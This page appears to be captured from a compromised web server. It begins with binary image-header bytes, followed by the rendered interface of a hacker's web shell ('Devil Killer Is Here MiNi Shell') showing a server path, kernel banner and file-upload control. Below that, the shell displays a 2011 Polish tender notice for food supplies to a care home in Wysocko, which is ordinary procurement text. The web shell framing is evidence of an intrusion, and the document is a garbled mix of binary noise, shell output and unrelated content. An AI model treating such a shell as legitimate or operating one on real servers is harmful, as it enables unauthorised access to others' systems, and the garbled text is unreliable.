JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20110606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20110606/145348-N-2011.html

<p class="kh_header"><b>Laszki: Dostawa artykułów spożywczych do DPS w Wysocku</b><br>
<b>Numer ogłoszenia: 145348 - 2011; data zamieszczenia: 06.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Wysocku , Wysocko 2, 37-543 Laszki, woj. podkarpackie, tel. 016 6285357.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przetargi.ipzp.pl/dpswysocko</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych do DPS w Wysocku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest dostawa artykułów spożywczych do DPS w Wysocku
Określenie przedmiotu zamówienia: 
Przedmiot niniejszego zamówienia obejmuje dostawę artykułów spożywczych według Kodu CPV - 15.00.00.00-8 w następujących kategorii: 
Kategoria Nr 1 - dostawa WARZYW, OWOCÓW , JAJ     
Kategoria Nr 2 - dostawa WĘDLIN I MIĘSA         
Kategoria Nr 3 - dostawa NABIAŁU                        
Kategoria Nr 4 - dostawa MROŻONEK I KONSERWY RYBNYCH  
Kategoria Nr 5 - dostawa PIECZYWA                    
Kategoria Nr 6 - dostawa WYROBÓW CUKIERNICZYCH    
Kategoria Nr 7 - dostawa POZOSTAŁYCH RÓŻNYCH ARTYKUŁÓW SPOŻYWCZYCH, ARTYKUŁÓW SYPKICH I DŻEMÓW
Zamawiający zastrzega sobie możliwość zmniejszenia ilości zamówionego towaru.
Zamawiający będzie składał Wykonawcy sukcesywne zamówienia przekazywane faxem lub telefonicznie  i potwierdzone faxem następnego dnia .
Zamówienie będzie składane z 2 - dniowym wyprzedzeniem przed ustalonym terminem dostawy. Osoba upoważnioną do składania zamówienia jest Insp. ds. Żywienia.
Wykonawca dostarczy towar bez względu na wielkość zamówienia w ciągu 2 dni roboczych licząc od dnia otrzymania zamówienia.
Zamawiany towar Wykonawca dostarczać będzie na własny koszt do magazynu DPS w godz.
od 7 do 11.
Wykonawca zobowiązany jest dostarczyć zamówiony towar w opakowaniu zapewniającym odpowiednie warunki sanitarne oraz zabezpieczającym go przed zniszczeniem lub uszkodzeniem, transportem spełniającym wymagania higieniczno - sanitarne. Dla wyrobów mleczarskich i mięsa Wykonawca zobowiązuje się do zachowania tzw. Ciągu chłodniczego, tj. przechowywania i transportu wyrobów w urządzeniach spełniających warunki techniczne przewidziane w polskiej normie.
Zamawiający zobowiązany jest każdorazowo w obecności przedstawiciela Wykonawcy dokonać ilościowego i jakościowego odbioru towaru, który potwierdza przez pokwitowanie dowodu dostawy.
1.Zamawiający zobowiązuje się do zbadania towaru podczas odbioru i dokona sprawdzenia :
         	1.1 Warunków transportu, w tym czystości środka transportu  opakowań i inne  
            warunki mające wpływ na jakość zdrowotną przewożonych artykułów oraz sposób   
            wyładowania zapobiegający ich zanieczyszczeniu
            1.2 Dokumentacji dotyczącej dostarczonych artykułów spożywczych , w tym  
             pochodzenia, producenta, daty produkcji i świadectwo kontroli jakości.
            1.3 Opakowań zbiorczych i jednostkowych: obce zapachy, uszkodzenia ,  
             zawilgocenie, bombaż puszek, obecności szkodników itp.
            1.4 Znakowania artykułów spożywczych, a zwłaszcza terminu przydatności                     
            do spożycia i daty minimalnej trwałości, czytelności i trwałości znakowania,
            1.5 Cech organoleptycznych, widocznych zanieczyszczeń, zapleśnienia,           
             szkodników itp.
            2.W przypadku niedochowania powyższych wymogów Wykonawca ma obowiązek 
            uznania reklamacji jakości dostarczonego towaru i na własny koszt jest zobowiązany    
            wymienić towar na pełnowartościowy, nie budzący żadnych zastrzeżeń oraz w razie 
            potrzeby zastosować inny środek transportu.   
2. Odpowiedzialność za dostarczany i odbierany towar określa moment odbioru towaru 
     ( przekazania)
3.	 W razie stwierdzenia braków Wykonawca uzupełni towar w tym samym dniu lub najpóźniej następnego dnia bez żadnej dopłaty.

4. Wykonawca zobowiązuje się dostarczać towar dobrej jakości tj. świeży, I gatunku, czysty, bez obcych zapachów o właściwej gramaturze oraz z właściwym terminem przydatności do spożycia
5.Termin przydatności dostarczonego towaru ma być nie mniejszy niż 50 % całkowitego okresu przydatności do spożycia.
6.Towar będzie oznaczony zgodnie z obowiązującymi przepisami. Musi posiadać na opakowaniu opis i cechowanie określające jego właściwości. Opakowanie nie powinno wskazywać oznak uszkodzeń mechanicznych. Towar nie może wykazać oznak nieświeżości, przemrożenia bądź zepsucia.
 7.  W celu potwierdzenia jakości dostarczanego przez Wykonawcę towaru Wykonawca zobowiązany jest do przedłożenia Zamawiającemu dokumentacji dotyczącej artykułów spożywczych, określających w szczególności ich pochodzenie, producenta, datę produkcji, świadectwo kontroli jakości (Handlowy Dokument Identyfikacyjny)
8. Brak wymaganych dokumentów wstrzymuje zapłatę za dostarczony towar.
9. W razie stwierdzenia przy odbiorze towaru , że nie odpowiada on zamówionemu
asortymentowi lub nie spełnia norm jakościowych, zamawiający ma prawo odmówić jego
odbioru, a Wykonawca zobowiązany jest niezwłocznie do dostarczenia nowego towaru.
10. W razie dostarczenia towaru złej jakości, której nie można było stwierdzić w trakcie odbioru towaru odbiorca ma prawo złożenia pisemnej lub telefonicznej reklamacji w ciągu 24 godzin od jego wykrycia, a Wykonawca jest zobowiązany wymienić reklamowany towar na wolny od wad..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.22.10.00-6, 03.22.00.00-9, 03.21.21.00-1, 03.14.25.00-3, 15.13.11.30-5, 15.13.11.35-0, 15.11.10.00-9, 15.11.00.00-2, 15.50.00.00-3, 15.88.10.00-7, 15.43.00.00-1, 15.22.10.00-3, 15.20.00.00-0, 15.33.11.70-9, 15.11.20.00-6, 15.23.40.00-7, 15.81.10.00-6, 15.84.23.00-5, 15.33.22.00-6, 15.85.10.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie zamówienia mogą ubiegać się wykonawcy spełniający wymagania określone w art. 22 ust. 1 ustawy:
a)	posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)	posiadają niezbędną wiedzę i doświadczenie, oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
d)	nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy.

2.	 Spełnienie warunku zostanie uznane, jeżeli Wykonawca w formie pisemnej przedłoży oświadczenie, że spełnia warunki udziału w postępowaniu zgodnie z wymaganiami określonymi w art. 22 ust. 1, art. 24  ustawy pzp oraz przedłoży  aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - data wystawienia nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Metodą spełnia - nie spełnia w oparciu o przedłożone dokumenty.
3.   Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np konsorcjum, spółka cywilna), ustanawiając pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (do oferty należy załączyć odpowiednie pełnomocnictwo). W takim przypadku warunki udziału w postępowaniu, dotyczące wykonawcy, odnoszą się odpowiednio do wykonawców, którzy ubiegają się wspólnie o zamówienie publiczne. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik pozostałych. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkie podmioty występujące wspólnie. Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy.
4.   W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia , warunki  określone w pkt.1a do 1c  winien spełniać jeden Wykonawca  lub Wykonawcy wspólnie, natomiast warunki określone w pkt. 1d winni spełniać wszyscy Wykonawcy osobno.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dostarczy artykuły spożywcze do magazynu DPS własnym transportem na własny koszt.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.ipzp.pl/dpswysocko<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Wysocku; 37-543 Laszki; powiat jarosławski; woj. podkarpackie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2011 godzina 10:00, miejsce: Dom Pomocy Społecznej w Wysocku;
37-543 Laszki
Sekretariat - Budynek Administracyjny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> WARZYWA, OWOCE,JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa warzyw, owoców, jaj w asortymencie i ilości: 1.	Pietruszka	Kg	100
2.	Marchew	Kg	450
3.	Cebula	Kg	300
4.	Buraczki ćwikłowe	Kg	250
5.	Fasola Jaś	Kg	25
6.	Kapusta czerwona	kg	80
7.	Kapusta biała	Kg	350
8.	Ogórki kiszone 	kg	60
9.	Kapusta pekińska	kg.	150
10.	Pomidory	Kg	200
11.	Ogórek zielony	Kg	100
12.	Pory	Kg	80
13.	Natka pietruszki (pęczek)	Szt.	120
14.	Koperek zielony (pęczek)	Szt.	160
15.	Sałata zielona	kg	25
16.	Seler	Kg	100
17.	Szczypiorek	Szt.	120
18.	Mak niebieski	Kg	4
19.	Papryka świeża 	Kg	15
20.	Kapusta kiszona	Kg	160
21.	Pieczarki świeże	kg	60
22.	Susz koperku 20g.	szt	20
23.	Susz natki pietruszki 20g. 	szt	20
24.	Czosnek	Kg	12
25.	Ziemniaki 	Kg	6000
26	Banany	Kg	230
27	Pomarańcze	Kg	80
28	Jabłka	Kg	500
29	Cytryny	Kg	20
30	Klementynki 	Kg	160
31	Jaja 	Szt.	7500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.22.10.00-6, 03.22.00.00-9, 03.21.21.00-1, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> WĘDLINY I MIĘSA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wędlin i mięsa w asortymencie i ilości:1.	Szynka drobiowa	Kg	50
2.	Szynka wieprzowaextra	Kg	30
3.	Kiełbasa szynkowa wp. extra	Kg	50
4.	Kiełbasa zwyczajna	Kg	130
5.	Kiełbasa parówkowa	Kg	130
6.	Kiełbasa krakowska parzona	Kg	70
7.	Kiełbasa wiejska	Kg	30
8.	Kiełbasa mortadela	Kg	60
9.	Kiełbasa lencz	Kg	70
10.	Parówki śniadaniowe	Kg	40
11.	Kiszka gryczana wiejska	Kg	70
12.	Pieczeń myśliwska	Kg	120
13.	Pasztet luzem wp. delikatesowy	Kg	50
14.	Pasztetowa firmowa	Kg	60
15.	Salceson regionalny	Kg	70
16.	Smaczek konserwowy	Kg	90
17.	Szynka kanapkowa	Kg	80
18.	Boczek wędzony	Kg	30
19.	Baleron got. wieprz.	Kg	40
20.	Szynka  konserwowa blok	Kg	70
21	Parówki drobiowe	Kg	40
22	Polędwica wieprzowamięso 	Kg	50
23	Karkówka wieprzowa bez kości	Kg	150
24	Kości wieprzowe pokrzepowe	Kg	200
25	Łopatka wp. b/k mięso	Kg	140
26	Mięso mielone wp.	Kg	200
27	Galareta wp.	kg	60
28	Mięso - pieczeń wołowa ekstra 	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.13.11.30-5, 15.13.11.35-0, 15.11.11.11-9, 15.11.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa nabiału w asortymencie i ilości: 1.	Twaróg chudy	Kg	250
2.	Śmietana 18 %	L	430
3.	Masło z olejem extra 200g	Kg	160
4.	Ser żółty salami	Kg	50
5.	Ser topiony 100 g	Szt.	900
6.	Ser plastry 150 g	Szt.	200
7.	Mleko pasteryzowane homogenizowane folia 2 %	L	3100
8.	Masło roślinne 500 g 	Kg	500
9.	Jogurt owocowy 125 g	Szt.	1800
10.	Kefir 200g	szt	1000
11	Maślanka 1l	l	240
12	Margaryna mleczna 250g	kg	180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3, 15.88.10.00-7, 15.43.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> MROŻONKI I KONSERWY RYBNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mrożonek i konserw rybnych w asortymencie i ilości:1.	Śledź w pomidorach ( 170 g konserwa )	Szt.	250
2.	Śledź w oleju ( 170 g konserwa )	Szt.	250
3.	Szprot w pomidorach ( 170 g konserwa )	Szt.	300
4.	Szprot w oleju ( 170 g konserwa )	Szt.	250
5.	Filety z makreli ( 170 g konserwa )	Szt.	70
6.	Paprykarz szczeciński ( 300 g konserwa )	Szt.	150
7.	Tuńczyk (185g konserwa)	szt	120
8.	Fasolka szparagowa ( 400 g mrożona)	szt	130
9.	Kalafior ( 400 g mrożony)	szt	200
10.	Barszcz ukraiński( 450 g mrożony)	szt	130
11.	Płaty rybne mrożone filet- panga  	Kg	100
12.	Kości kulinarne mrożone 	Kg	50
13.	Wątróbka drobiowa mrożona	Kg	60
14.	Noga z kurczaka  mrożona (udziec)	Kg 	300
15.	Kurczak 	kg	300
16.	Śledź w oleju 2.0 kg (wiadro)	Kg	50
17.	Kotlety rybne panierowane	kg	40
18	Mieszanka kompotowa 450g	szt	60
19	Bukiet jarzyn  450g.	szt	380
20	Dorsz  wędzony	kg	70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.22.10.00-3, 15.20.00.00-0, 15.33.11.70-9, 15.11.20.00-6, 15.23.40.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pieczywa w asortymencie i ilości:1.	Chleb 950 g	Szt.	2830
2. 	Chleb razowy mieszany 750g	szt	1520
3.	Chleb owsiany 400g	szt	1130
4.	Chałka  500g.	Szt 	40
5.	Bułka zwykła 100 g	Szt.	7000
6	Rogal słodki 100 g	Szt.	600
7	Drożdżówka 90g.	Szt	800
8	Kartoflaki 100g	szt	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> WYROBY CUKIERNICZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wyrobów cukierniczych w asortymencie i ilości:1.	Herbatniki lekkie ciastka bez cukru(73 g paczki)	szt	250
2.	Wafelki bez cukru(70 g paczki)	szt	700
3.	Ciastka deserowe(75 g)	szt	200
4.	Czekolada bez cukru (80 g )	Szt.	40
5.	Czekolada (100 g )	Szt.	270
6.	Baton 35 g ( 7 days )	Szt.	700
7.	Listki waflowe b/c( 32 g )	Szt.	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.84.23.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> POZOSTAŁE RÓŻNE ARTYKUŁY SPOŻYWCZE, ARTYKUŁY SYPKIE I DŻEMY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa różnhych artykułów spożywczych, artykułów sypkich i dżemów w asortymencie i ilości:1.	Amoniak spożywczy( 25 g )	Szt.	5
2.	Herbata indyjska  100 g	Szt.	800
3.	Napój herbaciany  w granul. ( 300 g )	Szt.	70
4.	Sól kuchenna 1 kg	Kg	150
5.	Soda oczyszczona( 30 g )	Szt.	5
6.	Olej uniwersalny 1 l 	Szt.	70
7.	Olej uniwersalny 3 l 	Szt.	5
8.	Smalec kostka (250 g)	Kg	80
9.	Chrzan tarty( 270 g )	szt	60
10.	Kukurydza konserwowa ( 400 g )	szt	80
11.	Koncentrat pomidorowy 30 % (200g)	szt	220
12.	Pasztet drobiowy ( 290 g )	Szt.	500
13.	Groszek konserwowy( 400 g )	szt	70
14.	Papryka konserwowa 0.9l	Szt.	130
15.	Ogórki konserwowe( 0,9 l )	Szt.	70
16.	Cukier kryształ 1 kg	Kg	1200 
17.	Cukier puder 0,5 kg	Kg	10
18.	Kakao naturalne 200 g	Szt.	20
19.	Rosół kostka ( 120 g )	Szt.	40
20.	Żurek śląski ( 46 g )	szt	40
21.	Zupa pieczarkowa( 59 g torebki )	szt	20
22.	Zupa ogonowa(57g torebki )	szt	40
23.	Sos pieczarkowy (27 g )	Szt.	30
24.	Musztarda łagodna ( 470 g )	szt	170
25.	Majonez ( 0,9 l )	Szt.	25
26.	Ocet 10 %	L	30
27.	Przyprawa w płynie 0,9 l	Szt.	50
28.	Przyprawa warzywna do zup w proszku 200g	szt	170
29.	Przyprawa do piernika (25 g )	Szt.	10
30.	Cynamon (20 g )	Szt.	25
